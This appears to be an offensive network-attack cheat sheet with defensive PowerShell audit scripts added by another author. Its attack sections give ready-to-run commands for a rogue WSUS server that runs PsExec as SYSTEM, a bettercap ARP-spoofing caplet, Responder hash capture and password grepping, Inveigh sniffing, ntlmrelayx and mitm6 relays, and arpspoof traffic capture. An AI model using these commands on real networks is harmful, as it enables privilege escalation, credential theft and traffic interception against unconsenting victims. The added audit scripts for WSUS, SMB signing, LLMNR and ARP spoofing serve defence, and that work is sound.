
MITM

WSUS HTTP misconfiguration

Requirements

  1. Ability to obtain a MITM position against the vulnerable host
  2. Communication between the victim and the WSUS server is over HTTP
info

If you have user access on the victim machine, this allows you to obtain SYSTEM privileges.

If the poisoning does not work (different broadcast domains) and you have access to the victim machine, you can try setting a system proxy manually (attacker IP and port 8530). The proxy redirection of port 8530 is still needed.

You can also spoof other machines, but you then depend on their update check frequency.

Check registry on WSUS client machine

The protocol should be HTTP in the WUServer value. Example of a vulnerable URL: http://wsus-server.local:8530.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate"

Check that the computer uses WSUS for updates, and the update policy:

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU"

GPO alternative: Group Policy > Windows Components > Windows Update > Specify intranet Microsoft update service location.
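The two REG QUERY checks above can be folded into one client-side audit. The following PowerShell is an added example, not part of the original cheat sheet or the pywsus project: it reads the same WindowsUpdate and AU policy keys, parses the WUServer and WUStatusServer URLs, and flags the plaintext-HTTP setting that makes the attack possible. The function name Get-WsusPolicyFinding and the risk labels are my own.

```powershell
# Added example (not from the original page): audit a Windows client's WSUS policy
# and flag plaintext HTTP. Reading HKLM policy keys needs no elevation.

function Get-WsusPolicyFinding {
    $wuPath = 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate'
    $wu = Get-ItemProperty -Path $wuPath -ErrorAction SilentlyContinue
    $au = Get-ItemProperty -Path "$wuPath\AU" -ErrorAction SilentlyContinue

    # UseWUServer = 1 is what actually makes Automatic Updates talk to WUServer.
    $usesWsus = [bool]($au -and $au.UseWUServer -eq 1)

    if (-not $wu -or -not $wu.WUServer) {
        return [pscustomobject]@{
            Setting = 'WUServer'; Value = $null; UsesWsus = $usesWsus
            Risk = 'None'; Detail = 'No intranet WSUS server configured; client uses Microsoft Update.'
        }
    }

    foreach ($name in 'WUServer', 'WUStatusServer') {
        $url = $wu.$name
        if (-not $url) { continue }

        $uri = $null
        if (-not [System.Uri]::TryCreate($url, [System.UriKind]::Absolute, [ref]$uri)) {
            [pscustomobject]@{ Setting = $name; Value = $url; UsesWsus = $usesWsus
                               Risk = 'Unknown'; Detail = 'Value is not an absolute URL.' }
            continue
        }

        switch ($uri.Scheme) {
            'http' {
                # Plaintext transport: a MITM can answer the client's update requests and
                # hand it a Microsoft-signed binary with attacker-chosen arguments.
                $risk = if ($usesWsus) { 'High' } else { 'Medium' }
                $detail = 'WSUS traffic is unauthenticated HTTP; move the server to HTTPS (default port 8531) and update this policy.'
            }
            'https' { $risk = 'Low'; $detail = 'WSUS traffic is over TLS.' }
            default { $risk = 'Unknown'; $detail = "Unexpected scheme '$($uri.Scheme)'." }
        }
        [pscustomobject]@{ Setting = $name; Value = $url; UsesWsus = $usesWsus; Risk = $risk; Detail = $detail }
    }
}

Get-WsusPolicyFinding | Format-Table -AutoSize
```

A WUServer over HTTP with UseWUServer = 0 is reported as Medium rather than High because the client is then not actually consulting the intranet server, but the policy is still wrong and should be fixed before someone enables it.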

Tooling install

Install from https://github.com/GoSecure/pywsus.

Activate the venv if one was used during setup:

source ./venv/bin/activate

Start WSUS rogue server

Ensure PsExec64.exe is in the pywsus working directory (the WSUS client only accepts Microsoft-signed binaries).

python3 pywsus.py -H <ATTACKER_IP> -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "whoami > C:\\poc.txt" '

MITM position

Content of wsus.cap (bettercap caplet):

set arp.spoof.targets <COMMA_SEPARATED_LIST_OF_TARGETS_IP_OR_MAC>
arp.spoof on
set any.proxy.src_port 8530
set any.proxy.dst_port 8530
set any.proxy.dst_address <ATTACKER_IP>
any.proxy on

Start poisoning:

sudo bettercap -i <IFACE> --caplet wsus.cap

Responder

tip

Set challenge to 1122334455667788 in /etc/responder/Responder.conf.

The option -f may prevent challenge-response capture.

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3

NTLM

NTLM MITM attacks

tip

Inveigh can be executed without elevated privileges, but certain features such as the LLMNR spoofer will not be able to start. Make sure the ports used are allowed by the local firewall.

Sniffer

Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y
Stop-Inveigh

Packets can also be captured with netsh in order to extract the hashes later:

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack

misc::easyntlmchall

NTLM Relay

tip

SMB signing has to be disabled for this kind of attack. On Windows 10 machines IPv6 is preferred over IPv4.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
responder -I <interface> -r -d -w
ntlmrelayx.py -tf smbrelay.txt
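The Responder modes above and the relay tip both depend on host settings that a defender can read directly: LLMNR and NBT-NS name resolution (what Responder and Inveigh poison), the LmCompatibilityLevel that decides whether a client will ever answer with an NTLMv1 response, and SMB signing (which the relay tip says must be disabled). The following PowerShell is an added example, not part of the original cheat sheet or of any of the tools it lists; the function name Get-NtlmExposureReport is my own. It is meant to be run in an elevated prompt on the Windows host being audited.

```powershell
# Added example (not from the original page): report the host settings that
# LLMNR/NBT-NS poisoning and NTLM relay rely on.

function Get-NtlmExposureReport {
    # SMB signing: with RequireSecuritySignature = $true a relayed session is rejected.
    $smbServer = Get-SmbServerConfiguration
    $smbClient = Get-SmbClientConfiguration

    # LLMNR is disabled when the DNSClient policy sets EnableMulticastResolution to 0.
    $dnsPolicy = Get-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows NT\DNSClient' `
        -ErrorAction SilentlyContinue
    $llmnrOff = [bool]($dnsPolicy -and $dnsPolicy.EnableMulticastResolution -eq 0)

    # NetBIOS name service (NBT-NS) is per interface: NetbiosOptions 2 = disabled.
    $nbtEnabled = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces' |
        Get-ItemProperty | Where-Object { $_.NetbiosOptions -ne 2 }

    # LmCompatibilityLevel 0-2 lets the client answer with LM/NTLMv1 (the downgrade
    # target above); 3 and higher send NTLMv2 only. Absent means the OS default.
    $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $lmLevel = if ($null -ne $lsa.LmCompatibilityLevel) { [int]$lsa.LmCompatibilityLevel } else { 'default' }

    [pscustomobject]@{
        SmbServerSigningRequired = $smbServer.RequireSecuritySignature
        SmbClientSigningRequired = $smbClient.RequireSecuritySignature
        LlmnrDisabledByPolicy    = $llmnrOff
        NbtNsEnabledInterfaces   = @($nbtEnabled).Count
        LmCompatibilityLevel     = $lmLevel
    }
}

$r = Get-NtlmExposureReport
$r | Format-List

# Plain-language verdicts for the findings that matter for the attacks on this page.
if (-not $r.SmbServerSigningRequired) { Write-Warning 'SMB server signing not required: host accepts relayed sessions.' }
if (-not $r.SmbClientSigningRequired) { Write-Warning 'SMB client signing not required: outbound sessions can be relayed.' }
if (-not $r.LlmnrDisabledByPolicy)    { Write-Warning 'LLMNR enabled: name-resolution poisoning works on this segment.' }
if ($r.NbtNsEnabledInterfaces -gt 0)  { Write-Warning "NBT-NS enabled on $($r.NbtNsEnabledInterfaces) interface(s)." }
if ($r.LmCompatibilityLevel -is [int] -and $r.LmCompatibilityLevel -lt 3) {
    Write-Warning 'LmCompatibilityLevel below 3: client may answer with NTLMv1.'
}
```

The report covers the SMB side only; the IPv6/mitm6 variant further down additionally depends on WPAD auto-discovery and on IPv6 being preferred, which this script does not check.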

Add a computer account, then run BloodHound (not tested)

ntlmrelayx.py -t ldaps://<dc_fqdn> --add-computer
python bloodhound.py -d <domain> -u <computer>\$ -p '<password>'

PrivExchange (not tested)

ntlmrelayx.py -t ldap://<dc_fqdn> --escalate-user <user>

python privexchange.py -ah <fqdn> <dc_fqdn> -u <user> -d <domain>

IPv6

mitm6 -d <fqdn>
ntlmrelayx.py -wh <webserver_hosting_wpad>:80 -t smb://<target_ip>/ -i

ARP Spoofing

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -S 65535 -w out.pcap -vv

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -S 65535 -w out.pcap -vv
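Both arpspoof variants leave the same trace on a Windows victim: the gateway's ARP entry switches to the attacker's MAC, and one MAC ends up answering for more than one IP on the segment. The following PowerShell is an added example, not part of the original cheat sheet, showing how to check a host's neighbor cache for those symptoms; the function name Test-ArpCacheForSpoofing and the baseline MAC parameter are my own, and the baseline value is a placeholder you would record on a known-good day.

```powershell
# Added example (not from the original page): look for ARP spoofing symptoms in the
# Windows neighbor cache. Works from a normal user prompt.

function Test-ArpCacheForSpoofing {
    param([string]$BaselineGatewayMac)   # placeholder, e.g. 'AA-BB-CC-DD-EE-FF'

    $findings = @()

    # Default route gives the gateway IP and interface; its neighbor entry gives the MAC.
    $route = Get-NetRoute -AddressFamily IPv4 -DestinationPrefix '0.0.0.0/0' |
        Sort-Object RouteMetric | Select-Object -First 1
    $gw = Get-NetNeighbor -AddressFamily IPv4 -IPAddress $route.NextHop `
        -InterfaceIndex $route.InterfaceIndex -ErrorAction SilentlyContinue

    if ($gw -and $BaselineGatewayMac) {
        $seen     = ($gw.LinkLayerAddress -replace ':', '-').ToUpper()
        $expected = ($BaselineGatewayMac -replace ':', '-').ToUpper()
        if ($seen -ne $expected) {
            $findings += "Gateway $($route.NextHop) MAC is $seen, baseline was $expected"
        }
    }

    # One MAC answering for several reachable IPs on the same interface is the classic
    # 'attacker answers for both victim and gateway' pattern. Permanent entries are
    # broadcast/multicast mappings and are skipped.
    $dupes = Get-NetNeighbor -AddressFamily IPv4 -InterfaceIndex $route.InterfaceIndex |
        Where-Object { $_.LinkLayerAddress -and $_.State -notin 'Permanent', 'Unreachable' } |
        Group-Object LinkLayerAddress | Where-Object Count -gt 1
    foreach ($d in $dupes) {
        $findings += "MAC $($d.Name) answers for: $(($d.Group.IPAddress) -join ', ')"
    }

    return $findings
}

$result = Test-ArpCacheForSpoofing -BaselineGatewayMac 'AA-BB-CC-DD-EE-FF'
if ($result) { $result | ForEach-Object { Write-Warning $_ } } else { 'No ARP spoofing symptoms found.' }
```

A MAC legitimately serving several IPs (a router with secondary addresses, a virtualization host) will also show up in the duplicate list, so treat that part as a prompt to compare against the network inventory rather than as proof on its own; the gateway MAC comparison against a recorded baseline is the stronger signal.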